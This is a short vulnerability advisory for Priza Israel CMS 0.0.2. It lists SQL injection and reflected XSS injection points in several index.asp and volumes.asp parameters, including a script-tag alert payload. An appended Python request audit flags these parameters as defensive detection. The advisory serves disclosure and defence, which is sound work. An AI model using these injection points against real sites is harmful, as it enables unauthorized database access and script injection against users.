Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
Author: BHG Security Center
Software link:
Affected version: [0.0.2]
Tested on: ubuntu 11.04
Discovered by:
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
 
-----------------------------------------------------------------------------------------
Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
 
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
 
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]
 
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]
 
~ [PoC] ~: /website_path/volumes.asp?id=18
 
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]
 
~~~~~~~~ Test
 
~ [PoC] ~: /path/index.asp?p_id=201&id=[SQLi]
 
~ [PoC] ~: /path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>
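
Added example, not part of the original advisory: a request audit that a defender could run over access logs or place in front of the application, flagging the parameters listed above when they carry unexpected input. It assumes p_id, id and page_id are meant to be integers (inferred from the sample values 201, 18 and 28) and that id is the affected parameter of volumes.asp; the function name and the sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names, per script. Treating the id-style ones as
# integers is an assumption drawn from the sample values (201, 18, 28).
INT_PARAMS = {"index.asp": {"p_id", "id", "page_id"}, "volumes.asp": {"id"}}
TEXT_PARAMS = {"index.asp": {"string"}}
HTML_META = re.compile(r"[<>\"']")


def audit_request(url):
    """Return a list of (parameter, reason) findings for one request URL."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name, values in query.items():
        key = name.lower()
        for value in values:
            if key in INT_PARAMS.get(script, ()) and not re.fullmatch(r"\d{1,9}", value):
                findings.append((key, "non-integer value"))
            elif key in TEXT_PARAMS.get(script, ()) and HTML_META.search(value):
                findings.append((key, "HTML metacharacters"))
    return findings


# Constructed sample requests (not real traffic). "7x" stands in for any
# non-numeric value; the search string is the one shown in the advisory.
SAMPLES = [
    "/site/index.asp?p_id=201&id=7",
    "/site/index.asp?p_id=201&id=7x",
    "/site/index.asp?page_id=",
    "/site/volumes.asp?id=18",
    "/site/index.asp?action=find&page_id=28&string=%22%3E%3Cscript%3Ealert(0)%3C/script%3E",
    "/site/index.asp?action=find&page_id=28&string=annual+report",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", audit_request(sample) or "ok")
```

Filtering of this kind is a stopgap for detection and triage; the fix in the application itself is parameterized queries for the id-style parameters and HTML-encoding of the search string on output.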
 
 
 
-------------------------------- [ EOF ] ----------------------------------